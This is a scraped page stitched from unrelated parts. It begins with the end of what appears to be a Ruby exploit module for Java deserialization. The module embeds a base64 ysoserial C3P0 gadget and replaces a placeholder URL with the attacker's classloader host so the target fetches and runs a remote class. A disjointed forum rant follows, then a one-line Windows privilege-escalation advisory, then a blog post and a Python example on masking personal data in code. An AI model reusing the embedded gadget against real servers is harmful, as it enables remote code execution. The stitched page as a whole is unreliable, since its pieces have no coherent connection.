  # java -jar ysoserial-0.0.6-SNAPSHOT-all-c3p0-0.9.1.2.jar C3P0 'http://whatever/:ExploitClass' | base64
  def go_go_gadget
    gadget = Rex::Text.decode_base64(
      <<~EOF
        rO0ABXNyAChjb20ubWNoYW5nZS52Mi5jM3AwLlBvb2xCYWNrZWREYXRhU291cmNlZoRH/BzETxgC
        AAB4cgA1Y29tLm1jaGFuZ2UudjIuYzNwMC5pbXBsLkFic3RyYWN0UG9vbEJhY2tlZERhdGFTb3Vy
        Y2UAAAAAAAAAAQMAAHhyADFjb20ubWNoYW5nZS52Mi5jM3AwLmltcGwuUG9vbEJhY2tlZERhdGFT
        b3VyY2VCYXNlAAAAAAAAAAEDAAdJABBudW1IZWxwZXJUaHJlYWRzTAAYY29ubmVjdGlvblBvb2xE
        YXRhU291cmNldAAkTGphdmF4L3NxbC9Db25uZWN0aW9uUG9vbERhdGFTb3VyY2U7TAAOZGF0YVNv
        dXJjZU5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABRmYWN0b3J5Q2xhc3NMb2NhdGlvbnEAfgAE
        TAANaWRlbnRpdHlUb2tlbnEAfgAETAADcGNzdAAiTGphdmEvYmVhbnMvUHJvcGVydHlDaGFuZ2VT
        dXBwb3J0O0wAA3Zjc3QAIkxqYXZhL2JlYW5zL1ZldG9hYmxlQ2hhbmdlU3VwcG9ydDt4cHcCAAFz
        cgA9Y29tLm1jaGFuZ2UudjIubmFtaW5nLlJlZmVyZW5jZUluZGlyZWN0b3IkUmVmZXJlbmNlU2Vy
        aWFsaXplZGIZhdDRKsITAgAETAALY29udGV4dE5hbWV0ABNMamF2YXgvbmFtaW5nL05hbWU7TAAD
        ZW52dAAVTGphdmEvdXRpbC9IYXNodGFibGU7TAAEbmFtZXEAfgAJTAAJcmVmZXJlbmNldAAYTGph
        dmF4L25hbWluZy9SZWZlcmVuY2U7eHBwcHBzcgAWamF2YXgubmFtaW5nLlJlZmVyZW5jZejGnqKo
        6Y0JAgAETAAFYWRkcnN0ABJMamF2YS91dGlsL1ZlY3RvcjtMAAxjbGFzc0ZhY3RvcnlxAH4ABEwA
        FGNsYXNzRmFjdG9yeUxvY2F0aW9ucQB+AARMAAljbGFzc05hbWVxAH4ABHhwc3IAEGphdmEudXRp
        bC5WZWN0b3LZl31bgDuvAQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwAL
        ZWxlbWVudERhdGF0ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFu
        Zy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQADEV4cGxvaXRDbGFzc3QAEGh0
        dHA6Ly93aGF0ZXZlci90AAdleHBsb2l0cHBwdwQAAAAAeHcCAAF4
      EOF
    )

    # Replace length-prefixed placeholder strings with our own
    gadget.sub!("\x00\x10http://whatever/", packed_classloader_uri)
    gadget.sub!("\x00\x07exploit", packed_class_name)
    gadget.sub("\x00\x0cExploitClass", packed_class_name)
  end

  # Convenience method to pack the classloader URI as a length-prefixed string
  def packed_classloader_uri
    "#{[@classloader_uri.length].pack('n')}#{@classloader_uri}"
  end
end
```

# 0day.today [2021-02-11] #
Source
  22. Young man, whatever I smoke or don't smoke, there's a van with opaque/matte windows that keeps driving around after me. The people I talked to told me the flashlights are very expensive; that's why I asked about an app. Thanks anyway. Edit/ "buddy", I had a driving licence back when you hadn't even been conceived; I know the whole list of car brands, from the Mobra with a sidecar -> Lăstun -> Ferrari. Edit3: ah, by the way, you eat rather a lot of "children". PS: drop the "jokes"
  23. Microsoft Windows has a privilege escalation vulnerability. When a process is running in a server silo, the checks for trusted hive registry key symbolic links are disabled, leading to elevation of privilege. Download GS20210210152159.tgz (5.4 KB) Source
  24. Data privacy and security is an essential R&D stage for many applications. Here, we'll walk you through how to securely handle sensitive or personal information in your applications and reduce the chance of it leaking. There are all kinds of data obfuscation tools out there. Instead of covering them, we'll share:

How we implement our own way to protect PII
Some of our data-masking techniques

What is PII?

Personally identifiable information (PII) is any data used to identify, locate, or contact an individual. Data privacy regulations each have their own standards of what constitutes PII, so be mindful of what PII you should protect. For starters, check out how the National Institute of Standards and Technology (NIST) classifies PII.

What is Sensitive Data?

While the term looks self-explanatory, the boundaries that separate sensitive data from the rest can still be blurry. So let's resort to the definitions from the European Commission. The following are considered sensitive data:

personal data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs;
trade-union membership;
genetic data, biometric data processed solely to identify a human being;
health-related data;
data concerning a person's sex life or sexual orientation.

In this walkthrough, we will use PII and sensitive data interchangeably. But in real life, sensitive data often refers to something more general and broad, while PII has a stricter definition.

Why is protecting PII/sensitive data so important?

Information and data privacy regulations and laws compel you to do so. Nobody wants to get slapped with a hefty fine! The European Union's (EU's) General Data Protection Regulation (GDPR) comes to mind. Depending on the nature of your application, it has to comply with data privacy requirements for it to be legally released and used by the end users.

Besides, keeping the user's data secure and private must be a default for any developer. Even if your team has the right attitude, it's often a careless mistake that causes a sensitive data exposure. Awareness is key to avoiding this; hopefully this piece will provide some insights. Onto the walkthrough!

The examples below are in Kotlin, but the underlying concepts and principles are applicable to all kinds of software development, especially on the front end.

Data Class Sensitive<T> – Masking Sensitive Data by Default

Here's our very own data-masking tool. When a data field itself contains a sensitive value, it should be encapsulated in the data class below to achieve data obfuscation by default. Since the toString() method is overridden to always return "masked", the actual value can't be printed unless explicitly requested. Access to sensitive or restricted information is controlled this way, reminding developers not to expose it. Below is a data-masking example class written in Kotlin:

    // Wrapper for a single sensitive value. Any implicit conversion to a
    // string (println, string templates, logging) yields "masked"; the real
    // value is only returned by the explicit getSensitive() call.
    data class Sensitive<T>(private val data: T) {
        override fun toString() = "masked"
        fun getSensitive(): T = data
    }

A hint: some programming languages support memory erasure; you may want to implement a clear() function with that.

Here's an example data class User where three of its properties are considered sensitive and hence need data masking with Sensitive<T>:

    data class User(
        val name: Sensitive<String>,
        val email: Sensitive<String>,
        val cardLast4: Sensitive<String>,
        val username: String   // not treated as PII here, printed in clear
    )

Below is a demo of masking with Sensitive<T>:

    data class Sensitive<T>(private val data: T) {
        override fun toString() = "masked"
        fun getSensitive(): T = data
    }

    data class User(
        val name: Sensitive<String>,
        val email: Sensitive<String>,
        val cardLast4: Sensitive<String>,
        val username: String
    )

    fun main() {
        val user = User(
            Sensitive("Elliot"),
            Sensitive("elliot@oursky.com"),
            Sensitive("1234"),
            "elliot"
        )
        println(user)                      // data class toString() -> every Sensitive field prints as "masked"
        println(user.name.getSensitive())  // explicit request -> real value
    }

An interactive code snippet is available here; try running it! The result should be:

    User(name=masked, email=masked, cardLast4=masked, username=elliot)
    Elliot

Explicitly Obtain Sensitive Data

In cases where the developer really has to obtain a sensitive data field, they can do so by calling the function getSensitive() from the data class Sensitive<T>. Such an operation is intentionally designed to be inconvenient so the developer needs to think twice before impetuously printing PII to the console.

Track Exposed Sensitive Data

To visualize which parts of the code explicitly request to expose sensitive data, type the following grep command in your terminal:

    grep -nR getSensitive .

This can be effortlessly integrated into a CI pipeline to run automatic checks for exposed sensitive data.

Build InputFields and Picker with Sensitive<T>

By wrapping standard UI widgets, regardless of the platform (iOS, Android, web), you can build input components like InputFields or DatePicker that return Sensitive<T>. Doing this secures the input flow of sensitive data, from the second an end user starts entering data to the end of your process.

This should be applied to all input components that take sensitive data, so that processes like masking credit card numbers or phone numbers become automatic. Let's say a user is entering a credit card CVC. We'll always handle it with a SensitiveInputField that returns Sensitive<String>. The actual CVC value is hidden until the serialization stage (for data transit), which minimizes direct contact. In other words, a masked credit card CVC value becomes the default output of the user input process.

Disable Screenshot and Background Preview when Handling Sensitive Information

A thorough understanding of the behaviour of the underlying operating system is also essential to a secure development cycle. While we may have PII hidden by sensitive filters in the code and the log console, the sensitive value is still shown on the UI. Make sure to disable the screenshot ability and background preview on such screens.

Android – Disable Screenshot

    // Marks the window as secure: the system refuses screenshots and
    // screen recording of this window.
    window.setFlags(WindowManager.LayoutParams.FLAG_SECURE, WindowManager.LayoutParams.FLAG_SECURE)

Android – Hide Sensitive Screen on Recent Apps List

This StackOverflow post covers the logic in the lifecycle callbacks onPause() and onResume() to hide an app's screen from the Recent Apps list on Android. It may not work on older Android versions (i.e., pre-Android 8/Oreo), so you may have to opt for more robust measures like setting android:excludeFromRecents="true" in your manifest, or temporarily replacing the screen with a black image.

iOS – Replace Task Switcher Thumbnail

This document covers how to hide sensitive information from the Task Switcher preview.

Store Sensitive Data in Mobile Apps with the System Secret Manager

Avoid storing sensitive data in your app (though sometimes it's inevitable), like storing an access token in local storage.

Android

Always store such tokens in the Android Keystore. Here's a sample flow we've adopted lately:

Generate an AES key first (per app) and store it in the Android Keystore.
Encrypt tokens with the AES key before saving them to SharedPreferences.

iOS

Always go with Keychain Services.

Set your .gitignore, .dockerignore and .gcloudignore properly

A developer with less experience can set up a repo's .gitignore properly right at the start, but may never realize that other ignore files like .dockerignore are not configured carefully, which can lead to a lot of security problems. The internet is loaded with all kinds of ignore file templates and discussions about them, so be sure to study them thoroughly when you are not sure if yours is correct enough!

Conclusion

So, there you have it! Data masking blocks certain fields and pieces of data from being visible. These data obfuscation techniques help prevent sensitive information from being visible while preserving the data's integrity and overall semantics. The takeaway here is that there's no silver bullet for data masking and preventing sensitive data exposure. Depending on the business requirements, use cases, and the data you're working with, some techniques will be more relevant and need to be applied more consistently than others. There are also solutions with different stacks, like an authentication solution for web and mobile apps that has gone through rounds of security audit. For self-maintained ones, you'll have to take up the responsibility of securing PII. Source
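The masking-by-default pattern from the post above, as an added example that is not part of the original post or of Oursky's code: the Kotlin Sensitive<T> idea ported to Python so it runs stand-alone, extended with the pieces the post only describes in prose (a memory-wipe call, a masked log representation versus an explicit transit serialization, and the CI scan that mirrors `grep -nR getSensitive .`). The names reveal() (standing in for getSensitive()), wipe(), to_log(), to_transit() and find_reveals(), and the sample user and source snippets, are this example's own constructions.

```python
"""Masking-by-default wrapper in the spirit of the Kotlin Sensitive<T> above.
Added example, not code from the original post; reveal(), wipe(), to_log(),
to_transit() and find_reveals() are this example's own names."""
from __future__ import annotations

import json
import re
from dataclasses import asdict, dataclass
from pathlib import Path
from typing import Dict, Generic, List, Tuple, TypeVar

T = TypeVar("T")


class Sensitive(Generic[T]):
    """Holds one sensitive value. Every implicit conversion to text (str(),
    repr(), f-strings, %-formatting, logging, json.dumps(..., default=str))
    yields the literal "masked"; the real value only leaves via reveal()."""

    def __init__(self, data: T) -> None:
        self._data = data

    def reveal(self) -> T:
        # The one intentional exit; keep calls rare and easy to grep for.
        return self._data

    def __str__(self) -> str:
        return "masked"

    __repr__ = __str__

    def __format__(self, spec: str) -> str:
        return "masked"

    def wipe(self) -> None:
        """Best-effort memory erasure. Only a mutable buffer (bytearray) can be
        overwritten in place; str/int are immutable, so for those the most
        this can do is drop the reference. reveal() returns None afterwards."""
        if isinstance(self._data, bytearray):
            for i in range(len(self._data)):
                self._data[i] = 0
        self._data = None  # type: ignore[assignment]


@dataclass
class User:
    name: Sensitive[str]
    email: Sensitive[str]
    card_last4: Sensitive[str]
    username: str  # not modelled as PII here, so printed in clear


def to_log(user: User) -> str:
    """The representation that may reach logs: asdict() keeps the Sensitive
    objects, and json.dumps falls back to default=str for them, so each one
    serializes as "masked" while plain fields stay readable."""
    return json.dumps(asdict(user), default=str, sort_keys=True)


def to_transit(user: User) -> str:
    """Serialization for the wire: the one place that deliberately reveals.
    Do not hand the object to a reflective serializer instead; that would read
    the private field directly and bypass the masking entirely."""
    return json.dumps(
        {
            "name": user.name.reveal(),
            "email": user.email.reveal(),
            "card_last4": user.card_last4.reveal(),
            "username": user.username,
        },
        sort_keys=True,
    )


REVEAL_CALL = re.compile(r"\.reveal\(\)")


def find_reveals(sources: Dict[str, str]) -> List[Tuple[str, int, str]]:
    """CI counterpart of `grep -nR getSensitive .`: every (path, line number,
    line) that explicitly exposes a sensitive value, so each one is visible in
    review. `sources` maps a file path to that file's text."""
    hits: List[Tuple[str, int, str]] = []
    for path, text in sources.items():
        for lineno, line in enumerate(text.splitlines(), start=1):
            if REVEAL_CALL.search(line):
                hits.append((path, lineno, line.strip()))
    return hits


if __name__ == "__main__":
    # Constructed sample data, not a real person.
    user = User(Sensitive("Elliot"), Sensitive("elliot@oursky.com"),
                Sensitive("1234"), "elliot")
    print(user)             # User(name=masked, email=masked, card_last4=masked, username='elliot')
    print(f"{user.email}")  # masked
    print(to_log(user))
    print(to_transit(user))
    # Scan this very file: the only hits are the three calls in to_transit().
    print(find_reveals({__file__: Path(__file__).read_text()}))
    buf = bytearray(b"1234")
    secret = Sensitive(buf)
    secret.wipe()
    print(bytes(buf))       # b'\x00\x00\x00\x00'
```

Run it directly for the printed demo, or import it and call the functions. The design point is that everything implicit (repr, f-strings, logging, a generic JSON dump) goes through __str__/__format__ and masks, while the wire format is one named function whose reveal() calls the CI scan can enumerate. The wrapper does not protect against reflection: vars(user.email) or a reflective serializer still reads the field, which is why serialization must go through to_transit() rather than a generic object walker, and the same caveat applies to the Kotlin version with a reflection-based JSON library.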